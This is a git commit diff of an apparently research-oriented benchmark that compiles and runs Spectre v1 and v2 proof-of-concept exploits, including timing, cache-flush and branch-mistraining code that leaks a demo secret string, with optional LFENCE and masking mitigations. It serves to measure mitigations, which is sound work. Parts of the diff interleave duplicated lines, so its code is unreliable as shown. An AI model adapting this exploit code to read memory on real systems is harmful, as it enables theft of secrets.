Final touch: style and tabulations.

2022-01-28 16:33:17 +01:00 · 2022-01-28 16:33:17 +01:00 · 47946f6aed
commit 47946f6aed
parent 64f0c6b318
4 changed files with 400 additions and 614 deletions
--- a/6
+++ b/6
@ -34,11 +34,11 @@ LDFLAGS=	-fuse-ld=lld
 CCS=		clang gcc
 OPTIMIZATIONS=	0 1 2 3 fast s
 RETPOLINE= 	mretpoline
-UUID:=		$(shell uuid)
+UUID:=		$(shell uuid || uuidgen)
 RESULTS_FILE:=	results-$(UUID).json
 SSH_KEY=	octoupload
 TIMES=		3
-FLAGS=		-j
+OCTOFLAGS=	-j
 ### Octopus internals
 CPU:=		$(shell LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}')
@ -148,7 +148,7 @@ $(RESULTS_FILE): build
 	for p in $(PROGS); do \
 		for t in $$(seq $(TIMES)); do \
 			sleep 0.1; \
-			(taskset 01 ./$$p $(FLAGS) || printf "{ \"$$p\": false }")>> $@; \
+			(taskset 01 ./$$p $(OCTOFLAGS) || printf "{ \"$$p\": false }")>> $@; \
 			if ! [ "$$p" = "$(lastword $(PROGS))" ]; \
 				then echo ',' >> $@; \
 			else if ! [ $$t -eq $(TIMES) ]; \
--- a/octopus.h
+++ b/octopus.h
@ -0,0 +1,144 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <stdint.h>
 #include <getopt.h>
 #include <string.h>
 #include <x86intrin.h>
 #if defined(__i386__) || defined(__amd64__)
        #define CACHELINE_SIZE	64
 #else
        #error "unsupported architecture"
 #endif
 #if defined(__SSE__) && !defined(__SSE2__)
        #define NOSSE2
 #endif 
 #ifdef NOSSE2
 	#define NORDTSCP
 	#define NOMFENCE
 	#define NOCLFLUSH
 #endif //NOSSE2
 #ifndef NORDTSCP
 	#define LATENCY 42 + 42
 #else
 	#ifndef NOMFENCE
 		#define LATENCY 18 + 18
 	#endif
 #endif
 #ifdef MASKING_MITIGATION
 	/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 
 	 *
 	 * array_index_mask_nospec() - generate a mask that is ~0UL when the
 	 * 	bounds check succeeds and 0 otherwise
 	 * @index: array element index
 	 * @size: number of elements in array
 	 *
 	 * Returns:
 	 *     0 - (index < size)
 	 */
 	static inline unsigned long
 	array_index_mask_nospec(unsigned long index, unsigned long size)
 	{
 		unsigned long mask;
 		__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
 			:"=r" (mask)
 			:"g"(size),"r" (index)
 			:"cc");
 		return mask;
 	}
 #endif //MASKING_MITIGATION
 #ifdef NOCLFLUSH
 	#define CACHE_FLUSH_ITERATIONS 	2048
 	#define CACHE_FLUSH_STRIDE 	4096
 	uint8_t 	cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
 	/* Flush memory using long SSE instructions */
 	void 
 	flush_memory_sse(uint8_t * addr)
 	{
 		float*	p = (float *)addr;
 		float 	c = 0.f;
 		__m128 i = _mm_setr_ps(c, c, c, c);
 		int k, l;
 		/* Non-sequential memory addressing by looping through k by l */
 		for (k = 0; k < 4; k++)
 			for (l = 0; l < 4; l++)
 				_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
 	}
 #endif //NOCLFLUSH
 static inline unsigned
 timed_access(volatile uint8_t *addr)
 {
 	uint64_t	t0, t1;
 	#pragma GCC diagnostic ignored "-Wuninitialized"
 	unsigned int junk = junk;
 	#ifndef NORDTSCP
 		t0 = __rdtscp(& junk);
 		junk |= *addr;
 		t1 = __rdtscp(& junk);
 	#else
 		#ifndef NOMFENCE
 			/*
 			Since the rdstc instruction isn't serialized, newer processors will try to
 			reorder it, ruining its value as a timing mechanism.
 			To get around this, we use the mfence instruction to introduce a memory
 			barrier and force serialization. mfence is used because it is portable across
 			Intel and AMD.
 			*/
 			_mm_mfence();
 			t0 = __rdtsc(); 
 			_mm_mfence();
 			junk = *addr; 
 			_mm_mfence();
 			t1 = __rdtsc();
 			_mm_mfence();
 		#else
 			/*
 			The mfence instruction was introduced with the SSE2 instruction set, so
 			we have to ifdef it out on pre-SSE2 processors.
 			Luckily, these older processors don't seem to reorder the rdtsc instruction,
 			so not having mfence on older processors is less of an issue.
 			*/
 			t0 = __rdtsc();
 			junk |= *addr;
 			t1 = __rdtsc();
 		#endif // NOMFENCE
 	#endif // NORDTSCP 
 	return (unsigned)(t1 - t0 - LATENCY);
 }
 static void
 calibrate_threshold(unsigned int *threshold)
 {
 	volatile char		buf[2 * CACHELINE_SIZE];
 	volatile uint8_t*	bufp;
 	int			i;
 	const int 		cnt = 10000;
 	uint64_t 		tcache = 0;
 	__attribute__((unused))
 	volatile int 		junk = 0;
 	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1)));
 	junk |= *bufp;
 	for (i = 0, tcache = 0; i < cnt; i++) {
 		tcache += timed_access(bufp);
 	}
 	tcache = tcache / cnt;
 	if (threshold != NULL) {
 		*threshold = tcache + LATENCY;
 	}
 	return;
 }
--- a/spectre_v1.c
+++ b/spectre_v1.c
@ -19,332 +19,148 @@
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */
-#include <stdio.h>
+#include "octopus.h"
 #include <stdlib.h>
 #include <stdint.h>
 #include <getopt.h>
 #include <string.h>
 #include <x86intrin.h> /* for rdtscp and clflush */
-#if defined(__i386__) || defined(__amd64__)
+char*		secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
-#define CACHELINE_SIZE	64
+unsigned int	cache_hit_threshold, array1_size = 16;
-#else
+uint8_t		unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
-#error "unsupported architecture"
+uint8_t		temp = 0; /* Used so compiler won’t optimize out victim_function() */
 #endif
 #if defined(__SSE__) && !defined(__SSE2__)
 #define NOSSE2
 #endif 
 #ifdef NOSSE2
 #define NORDTSCP
 #define NOMFENCE
 #define NOCLFLUSH
 #endif //NOSSE2
 #ifndef NORDTSCP
 #define LATENCY 42 + 42
 #else
 #ifndef NOMFENCE
 #define LATENCY 18 + 18
 #endif
 #endif
 #ifdef MASKING_MITIGATION
 /* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 
 *
 * array_index_mask_nospec() - generate a mask that is ~0UL when the
 * 	bounds check succeeds and 0 otherwise
 * @index: array element index
 * @size: number of elements in array
 *
 * Returns:
 *     0 - (index < size)
 */
 static inline unsigned long
 array_index_mask_nospec(
                unsigned long index,
 		unsigned long size
                )
 {
        unsigned long mask;
 	__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
 			:"=r" (mask)
 			:"g"(size),"r" (index)
 			:"cc");
 	return mask;
 }
 #endif //MASKING_MITIGATION
 #ifdef NOCLFLUSH
 #define CACHE_FLUSH_ITERATIONS 2048
 #define CACHE_FLUSH_STRIDE 4096
 uint8_t 	cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
 /* Flush memory using long SSE instructions */
 void 
 flush_memory_sse(
                uint8_t * addr
                )
 {
        float * p = (float *)addr;
        float c = 0.f;
        __m128 i = _mm_setr_ps(c, c, c, c);
        int k, l;
        /* Non-sequential memory addressing by looping through k by l */
        for (k = 0; k < 4; k++)
                for (l = 0; l < 4; l++)
                        _mm_stderr_ps(&p[(l * 4 + k) * 4], i);
 }
 #endif //NOCLFLUSH
 char* 		secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
 unsigned int 	array1_size = 16;
 uint8_t 	unused1[64];
 uint8_t 	array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
 uint8_t 	unused2[64];
 uint8_t 	array2[256 * 512];
 uint8_t 	temp = 0; /* Used so compiler won’t optimize out victim_function() */
 unsigned	cache_hit_threshold;
 static inline unsigned
 timed_access(
                volatile uint8_t *addr
                )
 {
 	uint64_t	t0, t1;
        #pragma GCC diagnostic ignored "-Wuninitialized"
 	unsigned int junk = junk;
 	#ifndef NORDTSCP
        t0 = __rdtscp(& junk);
        junk |= *addr;
        t1 = __rdtscp(& junk);
 	#else
 	#ifndef NOMFENCE
        /*
        Since the rdstc instruction isn't serialized, newer processors will try to
        reorder it, ruining its value as a timing mechanism.
        To get around this, we use the mfence instruction to introduce a memory
        barrier and force serialization. mfence is used because it is portable across
        Intel and AMD.
        */
        _mm_mfence();
        t0 = __rdtsc(); 
        _mm_mfence();
        junk = * addr; 
        _mm_mfence();
        t1 = __rdtsc();
        _mm_mfence();
 	#else
        /*
        The mfence instruction was introduced with the SSE2 instruction set, so
        we have to ifdef it out on pre-SSE2 processors.
        Luckily, these older processors don't seem to reorder the rdtsc instruction,
        so not having mfence on older processors is less of an issue.
        */
        t0 = __rdtsc();
        junk |= *addr;
        t1 = __rdtsc();
 	#endif // NOMFENCE
 	#endif // NORDTSCP 
 	return (unsigned)(t1 - t0 - LATENCY);
 }
 static void
 calibrate_threshold(
                unsigned int    *threshold
                )
 {
 	volatile char 		buf[2 * CACHELINE_SIZE];
 	volatile uint8_t 	*bufp;
 	int 			i;
 	const int 		cnt = 10000;
 	uint64_t 		tcache = 0;
 	__attribute__((unused))
 	volatile int 		junk = 0;
 	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
 	    ~(CACHELINE_SIZE - 1)));
 	junk |= *bufp;
 	for (i = 0, tcache = 0; i < cnt; i++) {
 		tcache += timed_access(bufp);
 	}
 	tcache = tcache / cnt;
 	if (threshold != NULL) {
 		*threshold = tcache + LATENCY;
 	}
 	return;
 }
 void
-victim_function(
+victim_function(size_t x)
                size_t  x
                )
 {
-        if (x < array1_size) {
+	if (x < array1_size) {
 		#ifdef LFENCE_MITIGATION
-		/*
+			/*
-		 * According to Intel et al, the best way to mitigate this is to 
+			 * According to Intel et al, the best way to mitigate this is to 
-		 * add a serializing instruction after the boundary check to force
+			 * add a serializing instruction after the boundary check to force
-		 * the retirement of previous instructions before proceeding to 
+			 * the retirement of previous instructions before proceeding to 
-		 * the read.
+			 * the read.
-		 * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
+			 * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
-		 */
+			 */
-                _mm_lfence();
+			_mm_lfence();
 		#endif
 		#ifdef MASKING_MITIGATION
-                x &= array_index_mask_nospec(x, array1_size);
+			x &= array_index_mask_nospec(x, array1_size);
 		#endif
-                temp &= array2[array1[x] * 512];
+
-        }
+		temp &= array2[array1[x] * 512];
 	}
 }
 void
-leak(
+leak(size_t malicious_x, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
 	        size_t		malicious_x,
 	        uint8_t		value[2],
 	        int		score[2],
 	        unsigned	cache_hit_threshold
 	)
 {
 	static int		results[256];
-	int 			tries, i, j, mix_i;
+	int			tries, i, j, mix_i, junk = 0;
-	unsigned int 		junk = 0;
+	size_t			training_x, x;
-	size_t 			training_x, x;
+	volatile uint8_t*	addr;
 	volatile uint8_t 	*addr;
 	#ifdef NOCLFLUSH
-        int junk2 = 0;
+		int junk2 = 0;
-        int l;
+		int l;
-        (void)junk2;
+		(void)junk2;
 	#endif
 	for (i = 0; i < 256; i++) {
 		results[i] = 0;
        }
 	for (tries = 999; tries > 0; tries--) {
 		#ifndef NOCLFLUSH
 	        /* Flush array2[256*(0..255)] from cache */
 	        for (i = 0; i < 256; i++)
 	                _mm_clflush(&array2[i * 512]);
 		#else 
                /* Flush array2[256*(0..255)] from cache
                using long SSE instruction several times */
                for (j = 0; j < 16; j++) {
                        for (i = 0; i < 256; i++) {
                                flush_memory_sse( & array2[i * 512]);
                        }
                }
 		#endif
        	/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        	training_x = tries % array1_size;
        	for (j = 29; j >= 0; j--) {
 			#ifndef NOCLFLUSH
        		_mm_clflush(&array1_size);
 			#else
                        /* Alternative to using clflush to flush the CPU cache 
                         * Read addresses at 4096-byte intervals out of a large array.
                         * Do this around 2000 times, or more depending on CPU cache size. */
                        for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) {
                                junk2 = cache_flush_array[l];
                        }
 			#endif
        		for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
        		/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
        		/* Avoid jumps in case those tip off the branch predictor */
        		x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
        		x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
        		x = training_x ^ (x & (malicious_x ^ training_x));
        		/* Call the victim! */
        		victim_function(x);
        	}
        	/* Time reads. Order is lightly mixed up to prevent stride prediction */
        	for (i = 0; i < 256; i++) {
        		mix_i = ((i * 167) + 13) & 255;
        		addr = & array2[mix_i * 512];
                        if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
        		        results[mix_i]++; /* cache hit - add +1 to score for this value */
        	}
        	/* Locate highest results in j */
        	j = -1;
        	for (i = 0; i < 256; i++) {
        		if (j < 0 || results[i] >= results[j]) {
        			j = i;
        		}
        	}
        	if (results[j] >= 3)
        		break;
 	}
 	for (tries = 999; tries > 0; tries--) {
 		#ifndef NOCLFLUSH
 			/* Flush array2[256*(0..255)] from cache */
 			for (i = 0; i < 256; i++)
 				_mm_clflush(&array2[i * 512]);
 		#else 
 			/* Flush array2[256*(0..255)] from cache
 			using long SSE instruction several times */
 			for (j = 0; j < 16; j++) {
 				for (i = 0; i < 256; i++) {
 					flush_memory_sse(&array2[i * 512]);
 				}
 			}
 		#endif
 		/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
 		training_x = tries % array1_size;
 		for (j = 29; j >= 0; j--) {
 			#ifndef NOCLFLUSH
 				_mm_clflush(&array1_size);
 			#else
 				/* Alternative to using clflush to flush the CPU cache 
 				 * Read addresses at 4096-byte intervals out of a large array.
 				 * Do this around 2000 times, or more depending on CPU cache size. */
 				for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) {
 					junk2 = cache_flush_array[l];
 				}
 			#endif
 			for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
 			/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
 			/* Avoid jumps in case those tip off the branch predictor */
 			x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
 			x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
 			x = training_x ^ (x & (malicious_x ^ training_x));
 			/* Call the victim! */
 			victim_function(x);
 		}
 		/* Time reads. Order is lightly mixed up to prevent stride prediction */
 		for (i = 0; i < 256; i++) {
 			mix_i = ((i * 167) + 13) & 255;
 			addr = & array2[mix_i * 512];
 			if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
 			        results[mix_i]++; /* cache hit - add +1 to score for this value */
 		}
 		/* Locate highest results in j */
 		j = -1;
 		for (i = 0; i < 256; i++) {
 			if (j < 0 || results[i] >= results[j]) {
 				j = i;
 			}
 		}
 		if (results[j] >= 3)
 			break;
 	}
 	results[0] ^= junk; /* use junk so code above won’t get optimized out*/
 	value[0] = (uint8_t) j;
 	score[0] = results[j];
 }
 int 
-main(
+main(int argc, char** argv)
                int     argc,
                char**  argv
        ) 
 {
 	int		o;
 	size_t 		malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
-	int 		i, score[2], len = (int)strlen(secret);
+	int 		i, o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
-  	uint8_t 	value[2];
+	uint8_t 	value[2];
  	unsigned 	successes = 0;
  	int		json = 0;
 	while ((o = getopt(argc, argv, "t:j")) != EOF) {
 		switch (o) {
 			case 't':
 				cache_hit_threshold = atoi(optarg);
 				break;
-                        case 'j':
+			case 'j':
 				json++;
-                                break;
+				break;
 			default:
 			usage:
 				fprintf(stderr, "usage: %s [-j] "
-			    "[-t threshold]\n"
+				"[-t threshold]\n"
-			    "\t-j\t\tJSON output\n"
+				"\t-j\t\tJSON output\n"
-                            "\t-t INT\t\tfixed threshold\n", argv[0]);
+				"\t-t INT\t\tfixed threshold\n", argv[0]);
 				return 1;
 		}
 	}
-	if (argc != optind)
+	if (argc != optind) {
 		goto usage;
 	}
-	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ",
+	fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", argv[0] + 2, (int)strlen(secret));
 		argv[0] + 2,
 		(int)strlen(secret));
 	calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
 	#ifdef NOCLFLUSH
-        for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
+		for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
-                cache_flush_array[i] = 1;
+			cache_flush_array[i] = 1;
-        }
+		}
 	#endif
-
+	for (i = 0; i < (int)sizeof(array2); i++) {
 	for (i = 0; i < (int)sizeof(array2); i++)
 		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
-
+	}
 	while (--len >= 0) {
 		leak(malicious_x++, value, score, cache_hit_threshold);
 		if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
@ -358,57 +174,54 @@ main(
 	if (json) {
 		printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
 		#ifndef NORDTSCP
-        	printf("\"rdtscp\": true, ");
+			printf("\"rdtscp\": true, ");
-        	#else
+		#else
-        	printf("\"rdtscp\": false, ");
+			printf("\"rdtscp\": false, ");
-        	#endif
+		#endif
-       		#ifndef NOMFENCE
+	 	#ifndef NOMFENCE
-        	printf("\"mfence\": true, ");
+			printf("\"mfence\": true, ");
-        	#else
+		#else
-        	printf("\"mfence\": false, ");
+			printf("\"mfence\": false, ");
-        	#endif
+		#endif
-        	#ifndef NOCLFLUSH
+		#ifndef NOCLFLUSH
-        	printf("\"clflush\": true ");
+			printf("\"clflush\": true ");
-        	#else
+		#else
-        	printf("\"clflush\": false ");
+			printf("\"clflush\": false ");
-        	#endif
+		#endif
-        	printf("}, \"mitigations\": { ");
+			printf("}, \"mitigations\": { ");
-        	#ifdef LFENCE_MITIGATION
+		#ifdef LFENCE_MITIGATION
-        	printf("\"lfence\": true, ");
+			printf("\"lfence\": true, ");
-        	#else
+		#else
-        	printf("\"lfence\": false, ");
+			printf("\"lfence\": false, ");
-        	#endif
+		#endif
-        	#ifdef MASKING_MITIGATION
+		#ifdef MASKING_MITIGATION
-        	printf("\"masking\": true ");
+			printf("\"masking\": true ");
-        	#else
+		#else
-        	printf("\"masking\": false ");
+			printf("\"masking\": false ");
-        	#endif
+		#endif
-        	printf("}, ");
+		printf("}, ");
 		printf("\"threshold\": %d, ", cache_hit_threshold);
-		printf("\"success\": %.0f } }",
+		printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));	
 			100 * successes / (float)strlen(secret));	
 	}
 	fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
 	#ifndef NORDTSCP
-        fprintf(stderr, "RDTSCP ");
+		fprintf(stderr, "RDTSCP ");
-        #else
+	#else
-        fprintf(stderr, "RDTSC ");
+		fprintf(stderr, "RDTSC ");
-        #endif
+	#endif
-       	#ifndef NOMFENCE
+	 #ifndef NOMFENCE
-        fprintf(stderr, "MFENCE ");
+		fprintf(stderr, "MFENCE ");
-        #endif
+	#endif
-        #ifndef NOCLFLUSH
+	#ifndef NOCLFLUSH
-        fprintf(stderr, "CLFLUSH ");
+		fprintf(stderr, "CLFLUSH ");
-        #endif
+	#endif
-        #ifdef LFENCE_MITIGATION
+	#ifdef LFENCE_MITIGATION
-        fprintf(stderr, "LFENCE_MITIGATION ");
+		fprintf(stderr, "LFENCE_MITIGATION ");
-        #endif
+	#endif
-        #ifdef MASKING_MITIGATION
+	#ifdef MASKING_MITIGATION
-        fprintf(stderr, "MASKING_MITIGATION ");
+		fprintf(stderr, "MASKING_MITIGATION ");
-        #endif
+	#endif
-	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", 
+	fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
 		cache_hit_threshold,
 		100 * successes / (float)strlen(secret));
 	return 0;
 }
--- a/spectre_v2.c
+++ b/spectre_v2.c
@ -18,83 +18,20 @@
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */
-#include <stdio.h>
+#include "octopus.h"
 #include <stdlib.h>
 #include <stdint.h>
 #include <getopt.h>
 #include <string.h>
 #include <x86intrin.h> /* for rdtscp and clflush */
 #if defined(__i386__) || defined(__amd64__)
 #define CACHELINE_SIZE	64
 #else
 #error "unsupported architecture"
 #endif
 #if defined(__SSE__) && !defined(__SSE2__)
 #define NOSSE2
 #endif 
 #ifdef NOSSE2
 #define NORDTSCP
 #define NOMFENCE
 #define NOCLFLUSH
 #endif //NOSSE2
 #ifndef NORDTSCP
 #define LATENCY 42 + 42
 #else
 #ifndef NOMFENCE
 #define LATENCY 18 + 18
 #endif
 #endif
 #define GAP 1024
 #ifdef NOCLFLUSH
 #define CACHE_FLUSH_ITERATIONS 2048
 #define CACHE_FLUSH_STRIDE 4096
 uint8_t 	cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
 /* Flush memory using long SSE instructions */
 void 
 flush_memory_sse(
                uint8_t * addr
                )
 {
        float * p = (float *)addr;
        float c = 0.f;
        __m128 i = _mm_setr_ps(c, c, c, c);
        int k, l;
        /* Non-sequential memory addressing by looping through k by l */
        for (k = 0; k < 4; k++)
                for (l = 0; l < 4; l++)
                        _mm_stderr_ps(&p[(l * 4 + k) * 4], i);
 }
 #endif //NOCLFLUSH
 char* 		secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
-uint8_t 	channel[256 * GAP]; // side channel to extract secret phrase
+uint64_t*	target; // pointer to indirect call target
-uint64_t 	*target; // pointer to indirect call target
+unsigned int 	cache_hit_threshold, array1_size = 16;
-
+uint8_t 	unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
 unsigned int 	array1_size = 16;
 uint8_t 	unused1[64];
 uint8_t 	array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
 uint8_t 	unused2[64];
 uint8_t 	array2[256 * 512];
 uint8_t 	temp = 0; /* Used so compiler won’t optimize out victim_function() */
-unsigned	cache_hit_threshold;
+uint8_t 	channel[256 * GAP]; // side channel to extract secret phrase
 // mistrained target of indirect call
 int
-gadget(
+gadget(char* addr) 
 	char 	*addr
 	) 
 {
 	return channel[*addr * GAP]; // speculative loads fetch data into the cache
 }
@ -106,89 +43,13 @@ safe_target()
 	return 42;
 }
 static inline unsigned
 timed_access(
                volatile uint8_t *addr
                )
 {
 	uint64_t	t0, t1;
        #pragma GCC diagnostic ignored "-Wuninitialized"
 	unsigned int junk;
 	#ifndef NORDTSCP
        t0 = __rdtscp(& junk);
        junk |= *addr;
        t1 = __rdtscp(& junk);
 	#else
 	#ifndef NOMFENCE
        /*
        Since the rdstc instruction isn't serialized, newer processors will try to
        reorder it, ruining its value as a timing mechanism.
        To get around this, we use the mfence instruction to introduce a memory
        barrier and force serialization. mfence is used because it is portable across
        Intel and AMD.
        */
        _mm_mfence();
        t0 = __rdtsc(); 
        _mm_mfence();
        junk = * addr; 
        _mm_mfence();
        t1 = __rdtsc();
        _mm_mfence();
 	#else
        /*
        The mfence instruction was introduced with the SSE2 instruction set, so
        we have to ifdef it out on pre-SSE2 processors.
        Luckily, these older processors don't seem to reorder the rdtsc instruction,
        so not having mfence on older processors is less of an issue.
        */
        t0 = __rdtsc();
        junk |= *addr;
        t1 = __rdtsc();
 	#endif // NOMFENCE
 	#endif // NORDTSCP 
 	return (unsigned)(t1 - t0 - LATENCY);
 }
 static void
 calibrate_threshold(
                unsigned int    *threshold
                )
 {
 	volatile char 		buf[2 * CACHELINE_SIZE];
 	volatile uint8_t 	*bufp;
 	int 			i;
 	const int 		cnt = 10000;
 	uint64_t 		tcache = 0;
 	__attribute__((unused))
 	volatile int 		junk = 0;
 	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
 	    ~(CACHELINE_SIZE - 1)));
 	junk |= *bufp;
 	for (i = 0, tcache = 0; i < cnt; i++) {
 		tcache += timed_access(bufp);
 	}
 	tcache = tcache / cnt;
 	if (threshold != NULL) {
 		*threshold = tcache + LATENCY;
 	}
 	return;
 }
 // function that makes indirect call
 // note that addr will be passed to gadget via %rdi
 int 
-victim_function(
+victim_function(char* addr, int	input)
 	char 	*addr,
 	int 	input
 	)
 {
-        #pragma GCC diagnostic ignored "-Wuninitialized"
+	#pragma GCC diagnostic ignored "-Wuninitialized"
-	unsigned int junk = junk;
+	unsigned int result, junk = junk;
 	// set up branch history buffer (bhb) by performing >29 taken branches
 	// see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
 	//   for details about how the branch prediction mechanism works
@ -197,171 +58,142 @@ victim_function(
 		input += i;
 		junk += input & i;
 	}
 	int result;
 	// call *target
 	__asm volatile("callq *%1\n"
-                 "mov %%eax, %0\n"
+		 "mov %%eax, %0\n"
-                 : "=r" (result)
+		: "=r" (result)
-                 : "r" (*target)
+		: "r" (*target)
-                 : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
+		: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
 	return result & junk;
 }
 static inline void 
-leak(
+leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_threshold)
 	        char		*target_addr,
 	        uint8_t		value[2],
 	        int		score[2],
 	        unsigned	cache_hit_threshold
 	)
 {
 	static int		results[256];
-	int 			tries, i, j, mix_i;
+	int			tries, i, j, mix_i;
-	unsigned int 		junk = 0;
+	unsigned int		junk = 0;
-	volatile uint8_t 	*addr;
+	volatile uint8_t*	addr;
 	char			dummy = '@';
 	#ifdef NOCLFLUSH
-        int junk2 = 0;
+		int junk2 = 0;
-        int l;
+		int l;
-        (void)junk2;
+		(void)junk2;
 	#endif
 	for (i = 0; i < 256; i++) {
 		results[i] = 0;
 		channel[i * GAP] = 1;
-        }
+	}
 	for (tries = 999; tries > 0; tries--) {
 		*target = (uint64_t)&gadget;
 		#ifndef NOMFENCE
 		_mm_mfence();
 		#endif 
 		for (j = 50; j > 0; j--) {
-      			junk ^= victim_function(&dummy, 0);
+			junk ^= victim_function(&dummy, 0);
-    		}
+		}
-    		#ifndef NOMFENCE
+		#ifndef NOMFENCE
-		_mm_mfence();
+			_mm_mfence();
 		#endif 
 		#ifndef NOCLFLUSH
-	        for (i = 0; i < 256; i++)
+			for (i = 0; i < 256; i++) {
-	                _mm_clflush(&channel[i * GAP]);
+				_mm_clflush(&channel[i * GAP]);
 			}
 		#else 
-                for (j = 0; j < 16; j++) {
+			for (j = 0; j < 16; j++) {
-                        for (i = 0; i < 256; i++) {
+				for (i = 0; i < 256; i++) {
-                                flush_memory_sse(&channel[i * GAP]);
+					flush_memory_sse(&channel[i * GAP]);
-                        }
+				}
-                }
+			}
 		#endif
-    		#ifndef NOMFENCE
+		#ifndef NOMFENCE
-		_mm_mfence();
+			_mm_mfence();
 		#endif
 		// change to safe target
-    		*target = (uint64_t)&safe_target;
+		*target = (uint64_t)&safe_target;
 		#ifndef NOMFENCE
 		_mm_mfence();
 		#endif 
 		#ifndef NOMFENCE
 			_mm_mfence();
 		#endif 
 		// flush target to prolong misprediction interval
 		#ifndef NOCLFLUSH
-	        _mm_clflush((void*) target);
+			_mm_clflush((void*) target);
 		#else 
 			flush_memory_sse((void*) target);
 		#endif		
 		#ifndef NOMFENCE
-		_mm_mfence();
+			_mm_mfence();
 		#endif 
 		// call victim
-    		junk ^= victim_function(target_addr, 0);
+		junk ^= victim_function(target_addr, 0);
-    		#ifndef NOMFENCE
+		#ifndef NOMFENCE
-		_mm_mfence();
+			_mm_mfence();
 		#endif 
-
+		// now, the value of *addr_to_read should be cached even though
-		
+		// the logical execution path never calls gadget() 
-    		// now, the value of *addr_to_read should be cached even though
+     		/* Time reads. Order is lightly mixed up to prevent stride prediction */
-    		// the logical execution path never calls gadget()
+		for (i = 0; i < 256; i++) {
-
+			mix_i = ((i * 167) + 13) & 255;
-    		// time reads, mix up order to prevent stride prediction
+			addr = & channel[mix_i * GAP];
-
+			if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {
-        
+				results[mix_i]++; /* cache hit - add +1 to score for this value */
-        	/* Time reads. Order is lightly mixed up to prevent stride prediction */
+			}
-        	for (i = 0; i < 256; i++) {
+		}
-        		mix_i = ((i * 167) + 13) & 255;
+		/* Locate highest results in j */
-        		addr = & channel[mix_i * GAP];
+		j = -1;
-                        if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
+		for (i = 0; i < 256; i++) {
-        		        results[mix_i]++; /* cache hit - add +1 to score for this value */
+			if (j < 0 || results[i] >= results[j]) {
-        	}
